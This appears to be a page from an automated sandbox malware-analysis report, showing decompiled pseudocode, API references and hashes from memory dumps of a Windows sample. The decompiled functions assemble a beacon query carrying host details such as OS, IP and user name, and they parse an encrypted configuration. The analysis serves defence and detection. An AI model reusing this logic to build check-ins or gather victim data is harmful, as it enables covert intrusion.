				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E02F6B243(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E02F6B2FD(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E02F6B1E8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E02F6B243(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E02F6B2DF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x02f6b0e0
0x02f6b0e1
0x02f6b0e2
0x02f6b0e5
0x02f6b0e7
0x02f6b0ea
0x02f6b0eb
0x02f6b0ed
0x02f6b0ee
0x02f6b0ef
0x02f6b0f2
0x02f6b0fc
0x02f6b1ad
0x02f6b1b4
0x02f6b1bd
0x02f6b102
0x02f6b102
0x02f6b108
0x02f6b10e
0x02f6b111
0x02f6b114
0x02f6b118
0x02f6b11d
0x02f6b122
0x02f6b1a2
0x00000000
0x02f6b124
0x02f6b124
0x02f6b130
0x02f6b132
0x02f6b18d
0x02f6b18d
0x02f6b193
0x00000000
0x02f6b134
0x02f6b143
0x02f6b145
0x02f6b146
0x02f6b147
0x02f6b14a
0x02f6b14a
0x02f6b14c
0x00000000
0x02f6b14e
0x02f6b14e
0x02f6b198
0x02f6b150
0x02f6b150
0x02f6b154
0x02f6b15c
0x02f6b161
0x02f6b166
0x02f6b172
0x02f6b17a
0x02f6b181
0x02f6b187
0x02f6b18b
0x00000000
0x02f6b18b
0x02f6b14e
0x02f6b14c
0x00000000
0x02f6b132
0x02f6b1a6
0x02f6b1a6
0x02f6b1a6
0x02f6b122
0x02f6b1c2
0x02f6b1c9

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: d32b367a56cfc7d489605a1960a11247a85e5482fcf6c18367a36fa903a5adfb
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 8521B672900205AFDB14EF68CCC49BBB7A5FF44398B0581A9DA15EB245D730FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0122B6E0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.456939571.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction ID: 513319d3f90012416875a59dea29acf0d3adfe0e542db2c717954a47912bdf42
Opcode Fuzzy Hash: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction Fuzzy Hash: 4811E979A24209EFCB48CF58C091AADBBB1FF48310F2485A9DC0AD7751D770EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F6514F, Relevance: 34.7, APIs: 23, Instructions: 204
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02F6514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				long _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t35;
				int _t38;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr* _t57;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				int _t84;
				intOrPtr _t86;
				int _t89;
				intOrPtr* _t92;
				intOrPtr* _t93;
				void* _t94;
				void* _t98;
				void* _t99;
				void* _t100;
				intOrPtr _t101;
				void* _t103;
				int _t104;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t111;

				_t98 = __edx;
				_t94 = __ecx;
				_t26 = __eax;
				_t108 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t26 = GetTickCount();
				}
				_t27 =  *0x2f6d018; // 0xd5dd08ab
				asm("bswap eax");
				_t28 =  *0x2f6d014; // 0x3a87c8cd
				asm("bswap eax");
				_t29 =  *0x2f6d010; // 0xd8d2f808
				asm("bswap eax");
				_t30 =  *0x2f6d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t31 =  *0x2f6d2a4; // 0xb3a5a8
				_t3 = _t31 + 0x2f6e633; // 0x74666f73
				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x2f6d02c,  *0x2f6d004, _t26);
				_t34 = E02F657AB();
				_t35 =  *0x2f6d2a4; // 0xb3a5a8
				_t4 = _t35 + 0x2f6e673; // 0x74707526
				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
				_t111 = _t109 + 0x38;
				_t105 = _t104 + _t38;
				_t99 = E02F673E9(_t94);
				if(_t99 != 0) {
					_t86 =  *0x2f6d2a4; // 0xb3a5a8
					_t6 = _t86 + 0x2f6e8cb; // 0x736e6426
					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t89;
					HeapFree( *0x2f6d238, 0, _t99);
				}
				_t100 = E02F6614A();
				if(_t100 != 0) {
					_t81 =  *0x2f6d2a4; // 0xb3a5a8
					_t8 = _t81 + 0x2f6e8d3; // 0x6f687726
					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t84;
					HeapFree( *0x2f6d238, 0, _t100);
				}
				_t101 =  *0x2f6d324; // 0x3aa95b0
				_a32 = E02F6757B(0x2f6d00a, _t101 + 4);
				_t43 =  *0x2f6d2cc; // 0x0
				if(_t43 != 0) {
					_t77 =  *0x2f6d2a4; // 0xb3a5a8
					_t11 = _t77 + 0x2f6e8ad; // 0x3d736f26
					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
					_t111 = _t111 + 0xc;
					_t105 = _t105 + _t80;
				}
				_t44 =  *0x2f6d2c8; // 0x0
				if(_t44 != 0) {
					_t74 =  *0x2f6d2a4; // 0xb3a5a8
					_t13 = _t74 + 0x2f6e8a6; // 0x3d706926
					wsprintfA(_t105 + _t108, _t13, _t44);
				}
				if(_a32 != 0) {
					_t103 = RtlAllocateHeap( *0x2f6d238, 0, 0x800);
					if(_t103 != 0) {
						E02F6749F(GetTickCount());
						_t51 =  *0x2f6d324; // 0x3aa95b0
						__imp__(_t51 + 0x40);
						asm("lock xadd [eax], ecx");
						_t55 =  *0x2f6d324; // 0x3aa95b0
						__imp__(_t55 + 0x40);
						_t57 =  *0x2f6d324; // 0x3aa95b0
						_t106 = E02F64D2C(1, _t98, _t108,  *_t57);
						asm("lock xadd [eax], ecx");
						if(_t106 != 0) {
							StrTrimA(_t106, 0x2f6c294);
							_t63 =  *0x2f6d2a4; // 0xb3a5a8
							_push(_t106);
							_t15 = _t63 + 0x2f6e252; // 0x616d692f
							_t65 = E02F69DEF(_t15);
							_v20 = _t65;
							if(_t65 != 0) {
								_t92 = __imp__;
								 *_t92(_t106, _v4);
								 *_t92(_t103, _v0);
								_t93 = __imp__;
								 *_t93(_t103, _v32);
								 *_t93(_t103, _t106);
								_t71 = E02F6666E(0xffffffffffffffff, _t103, _v32, _v28);
								_v56 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E02F66106();
								}
								HeapFree( *0x2f6d238, 0, _v48);
							}
							HeapFree( *0x2f6d238, 0, _t106);
						}
						HeapFree( *0x2f6d238, 0, _t103);
					}
					HeapFree( *0x2f6d238, 0, _a24);
				}
				HeapFree( *0x2f6d238, 0, _t108);
				return _a12;
			}

0x02f6514f
0x02f6514f
0x02f6514f
0x02f65154
0x02f6515a
0x02f65164
0x02f65166
0x02f65166
0x02f65173
0x02f6517e
0x02f65181
0x02f6518c
0x02f6518f
0x02f65194
0x02f65197
0x02f6519c
0x02f6519f
0x02f651ab
0x02f651b8
0x02f651ba
0x02f651c0
0x02f651c5
0x02f651d0
0x02f651d2
0x02f651d5
0x02f651dc
0x02f651e0
0x02f651e2
0x02f651e7
0x02f651f3
0x02f651f5
0x02f65201
0x02f65203
0x02f65203
0x02f6520e
0x02f65212
0x02f65214
0x02f65219
0x02f65225
0x02f65227
0x02f65233
0x02f65235
0x02f65235
0x02f6523b
0x02f6524e
0x02f65252
0x02f65259
0x02f6525c
0x02f65261
0x02f6526c
0x02f6526e
0x02f65271
0x02f65271
0x02f65273
0x02f6527a
0x02f6527d
0x02f65282
0x02f6528c
0x02f6528e
0x02f65296
0x02f652af
0x02f652b3
0x02f652bf
0x02f652c4
0x02f652cd
0x02f652de
0x02f652e2
0x02f652eb
0x02f652f1
0x02f652fe
0x02f6530b
0x02f65311
0x02f6531d
0x02f65323
0x02f65328
0x02f65329
0x02f65330
0x02f65335
0x02f6533b
0x02f65341
0x02f65348
0x02f6534f
0x02f65355
0x02f6535c
0x02f65360
0x02f6536b
0x02f65370
0x02f65376
0x02f6537f
0x02f6537f
0x02f65390
0x02f65390
0x02f6539f
0x02f6539f
0x02f653ae
0x02f653ae
0x02f653c0
0x02f653c0
0x02f653cf
0x02f653e0

APIs

GetTickCount.KERNEL32 ref: 02F65166
wsprintfA.USER32 ref: 02F651B3
wsprintfA.USER32 ref: 02F651D0
wsprintfA.USER32 ref: 02F651F3
HeapFree.KERNEL32(00000000,00000000), ref: 02F65203
wsprintfA.USER32 ref: 02F65225
HeapFree.KERNEL32(00000000,00000000), ref: 02F65235
wsprintfA.USER32 ref: 02F6526C
wsprintfA.USER32 ref: 02F6528C
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F652A9
GetTickCount.KERNEL32 ref: 02F652B9
RtlEnterCriticalSection.NTDLL(03AA9570), ref: 02F652CD
RtlLeaveCriticalSection.NTDLL(03AA9570), ref: 02F652EB

Part of subcall function 02F64D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02F652FE,?,03AA95B0), ref: 02F64D57
Part of subcall function 02F64D2C: lstrlen.KERNEL32(?,?,?,02F652FE,?,03AA95B0), ref: 02F64D5F
Part of subcall function 02F64D2C: strcpy.NTDLL ref: 02F64D76
Part of subcall function 02F64D2C: lstrcat.KERNEL32(00000000,?), ref: 02F64D81
Part of subcall function 02F64D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F652FE,?,03AA95B0), ref: 02F64D9E

StrTrimA.SHLWAPI(00000000,02F6C294,?,03AA95B0), ref: 02F6531D

Part of subcall function 02F69DEF: lstrlen.KERNEL32(?,00000000,00000000,02F65335,616D692F,00000000), ref: 02F69DFB
Part of subcall function 02F69DEF: lstrlen.KERNEL32(?), ref: 02F69E03
Part of subcall function 02F69DEF: lstrcpy.KERNEL32(00000000,?), ref: 02F69E1A
Part of subcall function 02F69DEF: lstrcat.KERNEL32(00000000,?), ref: 02F69E25

lstrcpy.KERNEL32(00000000,?), ref: 02F65348
lstrcpy.KERNEL32(00000000,00000000), ref: 02F6534F
lstrcat.KERNEL32(00000000,?), ref: 02F6535C
lstrcat.KERNEL32(00000000,00000000), ref: 02F65360

Part of subcall function 02F6666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 02F66720

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02F65390
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 02F6539F
HeapFree.KERNEL32(00000000,00000000,?,03AA95B0), ref: 02F653AE
HeapFree.KERNEL32(00000000,00000000), ref: 02F653C0
HeapFree.KERNEL32(00000000,?), ref: 02F653CF

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: c1a193616332a2eeca4f703b179a7e6bd808e7d573ae4c56cdf18c4bfd20a99a
Instruction ID: 321ef8713da685c40f5a956301582bfdaf3eeb6d447a08f2e24ea9a6f9b91c15
Opcode Fuzzy Hash: c1a193616332a2eeca4f703b179a7e6bd808e7d573ae4c56cdf18c4bfd20a99a
Instruction Fuzzy Hash: 6261D131E80208BFD711ABA4EC4CE66B7EDEB48BC4F050915FA98D7250DB34E925CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F630FC, Relevance: 18.1, APIs: 12, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F630FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				WCHAR* _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				WCHAR* _t88;

				_t74 = __ecx;
				_t79 =  *0x2f6d33c; // 0x3aa9bb8
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E02F69810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x2f6c19c;
				}
				_t44 = E02F647E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E02F658BE(lstrlenW(0x2f6eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x2f6eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x2f6d2a4; // 0xb3a5a8
						_t18 = _t75 + 0x2f6eb38; // 0x530025
						wsprintfW(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E02F658BE(lstrlenW(0x2f6ec58) + _a8 + _t57 + _t58 + lstrlenW(0x2f6ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E02F6147E(_v16);
						} else {
							_t64 =  *0x2f6d2a4; // 0xb3a5a8
							_t31 = _t64 + 0x2f6ec58; // 0x73006d
							wsprintfW(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E02F6147E(_v8);
				}
				return _v20;
			}

0x02f630fc
0x02f63104
0x02f6310a
0x02f6311a
0x02f6311d
0x02f63122
0x02f63127
0x02f63129
0x02f63129
0x02f63132
0x02f63137
0x02f6313c
0x02f63142
0x02f6314c
0x02f63155
0x02f6315c
0x02f6316a
0x02f6317c
0x02f63181
0x02f63186
0x02f6318f
0x02f631a1
0x02f631af
0x02f631b7
0x02f631bc
0x02f631bf
0x02f631ca
0x02f631e1
0x02f631e5
0x02f63218
0x02f631e7
0x02f631ea
0x02f631f2
0x02f631fd
0x02f63205
0x02f6320d
0x02f63211
0x02f63211
0x02f631e5
0x02f63220
0x02f63225
0x02f6322c

APIs

GetTickCount.KERNEL32 ref: 02F63111
lstrlen.KERNEL32(00000000,80000002), ref: 02F6314C
lstrlen.KERNEL32(?), ref: 02F63155
lstrlen.KERNEL32(00000000), ref: 02F6315C
lstrlenW.KERNEL32(80000002), ref: 02F6316A
lstrlenW.KERNEL32(02F6EB38), ref: 02F63173
wsprintfW.USER32 ref: 02F631AF
lstrlen.KERNEL32(?), ref: 02F631B7
lstrlen.KERNEL32(?), ref: 02F631BF
lstrlenW.KERNEL32(?), ref: 02F631CA
lstrlenW.KERNEL32(02F6EC58), ref: 02F631D3
wsprintfW.USER32 ref: 02F631FD

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 4cb5e7e351140ff21a363af2edf86bb496721a0fea9a7c49db3b62f403f377bc
Instruction ID: 514eb46e9c330ffdf057a4858892fe427f5a21b646dbc13b8265b4818d720e70
Opcode Fuzzy Hash: 4cb5e7e351140ff21a363af2edf86bb496721a0fea9a7c49db3b62f403f377bc
Instruction Fuzzy Hash: 3C315976D0010EEBDF01AFA4CD48DAEBFB6EF48384B054491EA14A7211DB35DA21DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F64D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02F64D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2f6d2a4; // 0xb3a5a8
				_t1 = _t9 + 0x2f6e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02F66027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02F658BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02F66F33(_t34, _t41, _a8);
						E02F6147E(_t41);
						_t42 = E02F64759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02F6147E(_t36);
							_t36 = _t42;
						}
						_t43 = E02F64858(_t36, _t33);
						if(_t43 != 0) {
							E02F6147E(_t36);
							_t36 = _t43;
						}
					}
					E02F6147E(_t28);
				}
				return _t36;
			}

0x02f64d2c
0x02f64d2f
0x02f64d30
0x02f64d38
0x02f64d3f
0x02f64d46
0x02f64d4a
0x02f64d50
0x02f64d57
0x02f64d5c
0x02f64d6e
0x02f64d72
0x02f64d76
0x02f64d7c
0x02f64d81
0x02f64d91
0x02f64d93
0x02f64daa
0x02f64dae
0x02f64db1
0x02f64db6
0x02f64db6
0x02f64dbf
0x02f64dc3
0x02f64dc6
0x02f64dcb
0x02f64dcb
0x02f64dc3
0x02f64dce
0x02f64dce
0x02f64dd9

APIs

Part of subcall function 02F66027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,02F64D46,253D7325,00000000,00000000,74ECC740,?,?,02F652FE,?), ref: 02F6608E
Part of subcall function 02F66027: sprintf.NTDLL ref: 02F660AF

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02F652FE,?,03AA95B0), ref: 02F64D57
lstrlen.KERNEL32(?,?,?,02F652FE,?,03AA95B0), ref: 02F64D5F

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

strcpy.NTDLL ref: 02F64D76
lstrcat.KERNEL32(00000000,?), ref: 02F64D81

Part of subcall function 02F66F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02F64D90,00000000,?,?,?,02F652FE,?,03AA95B0), ref: 02F66F4A

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F652FE,?,03AA95B0), ref: 02F64D9E

Part of subcall function 02F64759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02F64DAA,00000000,?,?,02F652FE,?,03AA95B0), ref: 02F64763
Part of subcall function 02F64759: _snprintf.NTDLL ref: 02F647C1

Strings

=, xrefs: 02F64D98

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: f8750efeaf41451e39b5abad0c8737d10aa69041d8db1b7027a5b58a7e232a51
Instruction ID: f03a84057a0ab206ffa226b54d22189c4352b2c2aa3ec645303be91ffcee101e
Opcode Fuzzy Hash: f8750efeaf41451e39b5abad0c8737d10aa69041d8db1b7027a5b58a7e232a51
Instruction Fuzzy Hash: 58117373E011297B462277B59D8CCBF7AAEDE4ABD43050115F759AB600DF34D9028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F698F7, Relevance: 9.2, APIs: 6, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E02F698F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x2f6d2a0; // 0x59935a40
				if(E02F696D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x2f6d2d0 = _v12;
				}
				_t23 =  *0x2f6d2a0; // 0x59935a40
				if(E02F696D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x2f6d2a0; // 0x59935a40
						_t29 = E02F610CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x2f6d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x2f6d2a0; // 0x59935a40
						_t30 = E02F610CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x2f6d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x2f6d2a0; // 0x59935a40
						_t31 = E02F610CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x2f6d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x2f6d2a0; // 0x59935a40
						_t32 = E02F610CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x2f6d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x2f6d2a0; // 0x59935a40
						_t33 = E02F610CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x2f6d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x2f6d2a0; // 0x59935a40
						_t34 = E02F610CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E02F6A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E02F69B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x2f6d2a0; // 0x59935a40
						_t35 = E02F610CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E02F6A2EF(0, _t35) != 0) {
						_t86 =  *0x2f6d324; // 0x3aa95b0
						E02F64C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x2f6d238, 0, _t70);
					return 0;
				}
			}

0x02f698f7
0x02f698f7
0x02f698f7
0x02f698f7
0x02f698fa
0x02f698fb
0x02f698fc
0x02f69916
0x02f69924
0x02f69924
0x02f69929
0x02f69943
0x02f69ad2
0x02f69ad4
0x02f69949
0x02f69949
0x02f6994a
0x02f6994d
0x02f6994e
0x02f69953
0x02f69969
0x02f69955
0x02f69955
0x02f69962
0x02f69962
0x02f69973
0x02f69975
0x02f6997f
0x02f69984
0x02f69984
0x02f6997f
0x02f6998b
0x02f699a1
0x02f6998d
0x02f6998d
0x02f6999a
0x02f6999a
0x02f699a5
0x02f699a7
0x02f699b1
0x02f699b6
0x02f699b6
0x02f699b1
0x02f699bd
0x02f699d3
0x02f699bf
0x02f699bf
0x02f699cc
0x02f699cc
0x02f699d7
0x02f699d9
0x02f699e3
0x02f699e8
0x02f699e8
0x02f699e3
0x02f699ef
0x02f69a05
0x02f699f1
0x02f699f1
0x02f699fe
0x02f699fe
0x02f69a09
0x02f69a0b
0x02f69a15
0x02f69a1a
0x02f69a1a
0x02f69a15
0x02f69a21
0x02f69a37
0x02f69a23
0x02f69a23
0x02f69a30
0x02f69a30
0x02f69a3b
0x02f69a3d
0x02f69a47
0x02f69a4c
0x02f69a4c
0x02f69a47
0x02f69a53
0x02f69a69
0x02f69a55
0x02f69a55
0x02f69a62
0x02f69a62
0x02f69a6d
0x02f69a6f
0x02f69a72
0x02f69a73
0x02f69a7a
0x02f69a7c
0x02f69a7d
0x02f69a7d
0x02f69a7a
0x02f69a84
0x02f69a9a
0x02f69a86
0x02f69a86
0x02f69a93
0x02f69a93
0x02f69a9e
0x02f69aac
0x02f69ab6
0x02f69ab6
0x02f69ac3
0x02f69acf
0x02f69acf

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F6997B
